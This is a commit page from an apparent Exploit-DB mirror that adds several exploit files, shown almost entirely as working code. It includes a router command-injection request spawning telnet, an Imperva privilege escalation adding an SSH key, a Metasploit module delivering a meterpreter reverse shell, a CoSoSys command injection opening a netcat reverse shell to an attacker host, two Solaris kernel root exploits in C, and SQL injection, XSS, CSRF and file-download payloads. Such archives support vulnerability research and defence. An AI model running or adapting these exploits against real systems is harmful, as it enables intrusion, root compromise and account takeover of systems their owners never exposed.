bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-08-03

Browse source 
13 changes to exploits/shellcodes

Sun Solaris 11.3 AVS - Local Kernel root Exploit

Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)
AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation
SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)

wityCMS 0.6.1 - Cross-Site Scripting

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting
WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
TI Online Examination System v2 - Arbitrary File Download
PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection
CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
Seq 4.2.476 - Authentication Bypass
This commit is contained in:
Offensive Security 2018-08-03 05:01:46 +00:00
parent 903bf974eb
commit 9ea5e15796
14 changed files with 1238 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/hardware/webapps/45135.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
# Date: 2018-08-02
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.asus.com/
# Software Link: https://www.asus.com/Networking/DSLN12E_C1/HelpDesk_BIOS/
# Version: 1.1.2.3_345
# Tested on: 1.1.2.3_345
GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60utelnetd+-p+1337%60&pingCNT=5 HTTP/1.1
Host: www.target.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.target.com/Main_Analysis_Content.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
# To connect
1. telnet www.target.com 1337

56
exploits/linux/local/45130.py Executable file
View file

@ -0,0 +1,56 @@
# Title: Imperva SecureSphere <= v13 - Privilege Escalation
# Author: 0x09AL
# Date: 01/08/2018
# Tested on: Imperva SecureSphere 11.5,12.0,13.0
# Vendor: https://www.imperva.com/
# Vulnerability Description
# There is a program named PCE.py which runs as root and starts a unix domain socket listener in /tmp/PCEListener.
# The problem is that the permissions in this socket are misconfigured. Every user on the system can interact with it.
# Using this exploit you can add arbritary ssh keys to authorized_keys for the admin user and login as the admin.
# Steps to reproduce:
# 1. Be a low-privileged user like oracle,apache. (You can simulate it by using `su oracle`)
# 2. Create a keypair. ssh-keygen -t rsa -b 4096
# 3. Modify the ssh_key variable.
# 4. Run python exploit.py
# 5. Login as the admin user using ssh -i id_rsa admin@ip-address.
#
import socket
import sys
import time
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = '/tmp/PCEListener'
data = ''
# The ssh rsa-key to be added to the admin user.
ssh_key = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDVM24qDoENqa1oRHJZEgZS7M/eRXHEnr0/OhdgUPWUblJJAj+f5fF7VkgvnJNSz/25OElNck4Z1qqpENBtHhe27H9100z2RceebKzNMOxHD2Sdut00uNMgL97AAuzhq6471XmcutHsndT12Bd85yxQPJiGaLIyEqgVigMaAz5Jya1pw4pB7r3m4hRbeFOaS74Edzr2pk8ND1EG/CG4qTP+dt0VhyjyEimZtt+2h4VT2spRNGzLO32vjPk4hSSSeu1dqPjg6dCNwgz6JS3clAaugeT8gnWjMnrt63PIUiXcioqEbJz+IHN20MHl2GXNuzAAvSw7U7ko4BhumfgchyFmkmfS6HdtP25kiQ6A4RexcAkfbfSYsapepHlvai1+FN+M67TpIpUlIR0xNrvJEgF6/51vAGCnOjZz4BDN740JHfGxAThyny5r4FTo5c9ZNYF8jAb6TqSX4HRS/AFo8l7AynPntCnXQCYSHcH/2XG/osrDNnuh0pUlTqCK10O2GoskBsxIBYTmWEoj/6hsbQyDGuicVa/e/xweo7MA2pNAPwxYDZt/h4G/wMrCSAk6FoEL6YXMRK/RwW6p2FDYRLeCoDa/RQ8R7dEquTLTqPgQF8rPsSuhILp/CKv03JkNRq94pDyCFGHHyz+TifZ0m1yIt13N7f8BXqw7OYFJ8cFGww== pwn@wpad'
print >>sys.stderr, 'Connecting to %s' % server_address
try:
sock.connect(server_address)
except socket.error, msg:
print >>sys.stderr, msg
sys.exit(1)
try:
# Send data
message = '<commandSet Id="0" mode="Sync" sender="localhost"><commands><command num="0"><argv>platform ssh authorized create</argv><impctlParams/><params><param>--user=admin</param><param>--key=%s</param></params></command></commands></commandSet>' % ssh_key
message_size = "0" * (10 - len(str(len(message)))) + str(len(message))
print >>sys.stderr, 'Sending message size "%s"' % message_size
sock.sendall("%s" % message_size)
print >> sys.stderr, 'Sending exploit'
sock.sendall(message)
amount_received = 0
amount_expected = int(sock.recv(10))
while amount_received < amount_expected:
data += sock.recv(10)
amount_received = len(data)
time.sleep(0.5)
# print >>sys.stderr, 'received "%s"' % data
print >>sys.stderr, 'Response : \n %s' % data
finally:
print >>sys.stderr, 'closing socket'
sock.close()

139
exploits/linux/local/45132.rb Executable file
View file

@ -0,0 +1,139 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "SecureSphere v12.0.0.50 - SealMode Shell Escape (root)",
'Description' => %q{
This module exploits a vulnerability in SecureSphere cli to escape
the sealed-mode of Imperva and execute code as the root user. This
module requires credentials of a user to login to the SSH or can be
exploited by a less privileged user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'0x09AL', # Vulnerability Discovery and Metasploit Module
],
'References' =>
[
['URL', 'N/A']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "01/08/2018",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptString.new('Password', [ true, 'The password for authentication', '123456' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def exploit
factory = ssh_socket_factory
ssh_options = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => rport,
:use_agent => false,
:config => false,
:password => password,
:proxy => factory,
:non_interactive => true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection established successfully.")
ssh.open_channel do |channel|
channel.exec "impctl platform import --password \" & uname -a & sh\"" do |ch, success|
if success
channel.on_data do |ch, data|
if data.inspect.match(/Linux/)
print_good "Host is vulnerable"
channel.send_data "python -c \"#{payload.encoded}\"\n"
channel.close
else
print_bad "Host is not vulnerable"
channel.close
end
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end

26
exploits/php/webapps/45125.txt Normal file
View file

@ -0,0 +1,26 @@
*******************************************************************************************
# Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS
# Date: 26.06.2018
# Site Titel : Find your needs on Domain Name
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
# Category: Web Application
# Version: 2.0.1
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE: CVE-2018-13256
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://server/auditor/ ) .
2- Select REGISTER page (Register now) .
3- Create an account using your Email address => in FIRST NAME , LAST NAME ,and PASSWORD put this script <img src =x onError=alert("VIKAS")>
4- Now Check your Email and verify it .
5- Again come to site and login it using your verified Email and Password .
6- You will having popup VIKAS in you account when you loged in .
***************************************************************************************

48
exploits/php/webapps/45127.html Normal file
View file

@ -0,0 +1,48 @@
<!--
# Exploit Title: WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
# Vendor Homepage: https://creatiwity.net/witycms
# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.2
# Exploit Author: Porhai Eung
# Website: http://www.chhaipov.com
# CVE: CVE-2018-14029
# Category: webapps
1. Description
CSRF vulnerability in admin/user/edit in Creatiwity wityCMS 0.6.2 allows an attacker to take over a user account by modifying user's data such as email and password
2. Exploit and Proof of Concept
To exploit this vulnerability, victim need to be logged in at target site namely victim.com and visit crafted site made by attacker namely attacker.com. Then an authenticated POST request will be generated from victim browser and it will be submit to victim.com to modify user's data to attacker desired value.
- POC hosted at attacker.com
-->
</div>
<iframe id="test" name="test" style="display:none">
</iframe>
<form action="http://victim.com/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="nickname" value="admin" />
<input type="hidden" name="password" value="csrf123" />
<input type="hidden" name="password_conf" value="csrf123" />
<input type="hidden" name="email" value="csrf@test.com" />
<input type="hidden" name="groupe" value="0" />
<input type="hidden" name="type" value="all" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
var $form = document.getElementById ('the_form');
$form.submit ();
//]]>
</script>
</div>
<!--
3. Solution
- Original password is needed in order to change new password of user
- Implement CSRF token
-->

30
exploits/php/webapps/45128.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
====================================================
# Demo : server/admin/
# Vuln file : /admin/download.php
115. $data_action = $_REQUEST['action'];
116. if($data_action == 'downloadfile')
117. {
118. $file = $_REQUEST['file'];
119. $name = $file;
120. $result = output_file($file, $name);
# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'
====================================================

55
exploits/php/webapps/45129.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection
# Google Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371
# Version: 1.2
# Tested on: Kali linux
====================================================
Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'search_field' parameter in the management
panel.
# Demo : http://server/home/login
# PoC : SQLi :
http://server/admin/user_management/ajax_list_info
POST /admin/user_management/ajax_list_info HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/admin/user_management
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Cookie: ci_session=8v3965595vs5h1gcufa8kmkl8uti8ccr;
crud_page_c2dc7c9e0776f8cb12c51196de4108be=2;
per_page_c2dc7c9e0776f8cb12c51196de4108be=15;
hidden_ordering_c2dc7c9e0776f8cb12c51196de4108be=asc;
hidden_sorting_c2dc7c9e0776f8cb12c51196de4108be=id;
search_text_c2dc7c9e0776f8cb12c51196de4108be=tes;
search_field_c2dc7c9e0776f8cb12c51196de4108be=name
Connection: keep-alive
search_text=tes&search_field=name&per_page=15&order_by%5B0%5D=id&order_by%5B1%5D=asc&page=1
Parameter: search_field (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: search_text=tes&search_field=name AND (SELECT 4580 FROM(SELECT
COUNT(*),CONCAT(0x71716a7671,(SELECT
(ELT(4580=4580,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search_text=tes&search_field=name AND
SLEEP(5)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
====================================================

57
exploits/php/webapps/45131.py Executable file
View file

@ -0,0 +1,57 @@
# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
# Author : 0x09AL
# Tested on : Endpoint Protector 4.5.0.1
# Software Link : https://www.endpointprotector.com/
# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
# In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
# The command may take a while to execute.
import requests
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
username = 'root'
password = 'epp2011'
host = 'x.x.x.x.x'
rev_host = 'x.x.x.x'
rev_port = '443'
r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
payload = '&& %s' % shell
print payload
if(r.text.find("Welcome Guest")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in successfully [+]"
r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
if(r.text.find("csrf")>-1):
print "[+] Getting CSRF Token [+]"
csrf_token = r.text.split('value="')[1].split('">')[0]
print "[+] Token: %s [+]" % csrf_token
post_data = {
'csrf_token' : csrf_token,
'continent' :'Europe',
'region' :'Berlin',
'timeSetting[ntpserver]' : payload,
'timeSetting[timesync]' :'12'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Sending exploit [+]"
if(r.text.find("nc")>-1):
post_data = {
'ntpserver': payload,
'continent' :'Europe',
'region' :'Berlin'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Exploit success [+]"

514
exploits/solaris/local/45126.c Normal file
View file

@ -0,0 +1,514 @@
/*
# Exploit Title: Solaris/OpenSolaris AVS kernel code execution
# Google Dork: [if applicable]
# Date: 24/7/2018
# Exploit Author: mu-b
# Vendor Homepage: oracle.com
# Software Link:
# Version: Solaris 10, Solaris <= 11.3
# Tested on: Solaris 11.X, OpenSolaris
# CVE : CVE-2018-2892
http://digit-labs.org/files/exploits/sdbc-testinit.c
http://digit-labs.org/files/exploits/sdbc-testinit-v2.c
a few more added to digit-labs as well, old irix-espd remote root for
irix as well.
/* sdbc-testinit.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Sun Opensolaris <= snv_104 local kernel root exploit
* by mu-b - Sun 21 Dec 2008
*
* $Id: sdbc-testinit.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Opensolaris snv_104 (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl32_s {
unsigned int arg0;
unsigned int arg1;
unsigned int arg2;
unsigned int arg3;
unsigned int arg4;
unsigned int magic;
unsigned int ustatus;
unsigned int pad[1];
} _sdbc_ioctl32_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
#define KTHREAD 0x16
#else
#define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0xc(%eax)");
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *target;
_sdbc_ioctl32_t sdcp_ioctl;
_sysent_t sysent;
int devindx, fd, id, n, sysindx;
printf ("Sun Opensolaris <= snv_104 local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = NULL;
sysent.sy_callc = NULL;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp += 8; /* any ideas? */
target = sysentp + 0x2C0;
sysindx = ((int) target - (int) sysentp) / sizeof (sysent);
devindx = ((char *) target - (char *) devarrayp) / 256;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
memcpy ((ptr + PAGESIZE) - sizeof (sysent), &sysent, sizeof (sysent));
memset (&sdcp_ioctl, 0, sizeof (sdcp_ioctl));
sdcp_ioctl.arg0 = (unsigned int) (ptr + PAGESIZE) - sizeof (sysent);
sdcp_ioctl.arg1 = devindx;
sdcp_ioctl.arg2 = sizeof (sysent) * 2;
printf ("* devarray: 0x%08X, sysent: 0x%08X, target: 0x%08X\n", (int) devarrayp, (int) sysentp, (int) target);
printf ("* devarray idx: %u\n", sdcp_ioctl.arg1);
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdcp_ioctl);
printf ("done\n");
printf ("\n* jumping... ");
syscall (sysindx);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
*/
/* sdbc-testinit-v2.c
*
* Copyright (c) 2008-2017 by <mu-b@digit-labs.org>
*
* Sun Solaris <= 11.3 AVS local kernel root exploit
* by mu-b - Tue 16 May 2017
*
* $Id: sdbc-testinit-v2.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Solaris 5.11 11.3 + AVS (i86pc)
* Opensolaris snv_104 + AVS (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* This was originally found in OpenSolaris and later ported to Solaris with the
* exception that we now have to exploit a signedness bug in the devarray index
* parameter whereas previously it was unbounded! (see sdbc-testinit.c).
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <limits.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl {
long arg0;
long arg1;
long arg2;
long arg3;
long arg4;
long magic;
long ustatus;
long pad[1];
} _sdbc_ioctl_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
# define KTHREAD 0x18
#else
# define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
#ifdef _LP64
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %rax\n"
"mov 0x1c8(%rax), %rax\n"
"movl $0x0, 0x4(%rax)\n" /* kthread_t->t_cred->cr_uid */
"movl $0x0, 0x8(%rax)\n" /* kthread_t->t_cred->cr_gid */
"movl $0x0, 0xc(%rax)\n" /* kthread_t->t_cred->cr_ruid */
"movl $0x0, 0x10(%rax)"); /* kthread_t->t_cred->cr_rgid */
#else
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0x8(%eax)\n"
"movl $0x0, 0xc(%eax)\n"
"movl $0x0, 0x10(%eax)");
#endif
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
#ifdef _LP64
Elf64_Shdr *shdr;
if ((shdr = elf64_getshdr (scn)) != 0)
#else
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
#endif
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
#ifdef _LP64
Elf64_Sym *esym = (Elf64_Sym *) data->d_buf;
Elf64_Sym *lastsym = (Elf64_Sym *) ((char *) data->d_buf + data->d_size);
#else
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
#endif
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
#ifdef _LP64
(ELF64_ST_TYPE(esym->st_info) == STT_FUNC))
#else
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
#endif
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *targetp;
int align, fd, id, n, sysindx;
_sdbc_ioctl_t sdbc_ioctl;
_sysent_t sysent;
long devindx;
printf ("Sun (Open)Solaris <= 11.3 AVS local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = pown_kernel;
sysent.sy_callc = pown_kernel;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
/* devarray elements are 256-bytes in size, so we can only write at an offset
* aligned to devarrayp & 0xff */
targetp = (void *) (((long) sysentp & ~0xFF) | ((long) devarrayp & 0xFF));
targetp += 0x1700;
sysindx = ((long) targetp - (long) sysentp) / sizeof (sysent);
devindx = ((char *) targetp - (char *) devarrayp) / 256;
devindx = (long) LONG_MIN + devindx;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == (void *) -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
align = ((long) sysentp & 0x0F) - ((long) devarrayp & 0x0F);
if (align < 0)
align = -align;
memcpy ((ptr + PAGESIZE) - sizeof (sysent) - align, &sysent, sizeof (sysent));
memset (&sdbc_ioctl, 0, sizeof (sdbc_ioctl));
sdbc_ioctl.arg0 = (long) (ptr + PAGESIZE) - sizeof (sysent);
sdbc_ioctl.arg1 = devindx;
sdbc_ioctl.arg2 = sizeof (sysent) * 2;
#ifdef _LP64
printf ("* devarray: 0x%016lX, sysent: 0x%016lX, target: 0x%016lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %016lX\n", devindx, devindx);
#else
printf ("* devarray: 0x%08lX, sysent: 0x%08lX, target: 0x%08lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %08lX\n", devindx, devindx);
#endif
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdbc_ioctl);
if (n != -1)
{
printf ("failed, ouch (%d)\n", n);
return (EXIT_FAILURE);
}
printf ("done\n");
printf ("* jumping... ");
syscall (sysindx);
printf ("done\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
char *args[2] = { "/bin/sh", NULL };
printf ("+Wh00t\n\n");
execve (args[0], args, NULL);
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}

32
exploits/windows/local/45120.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
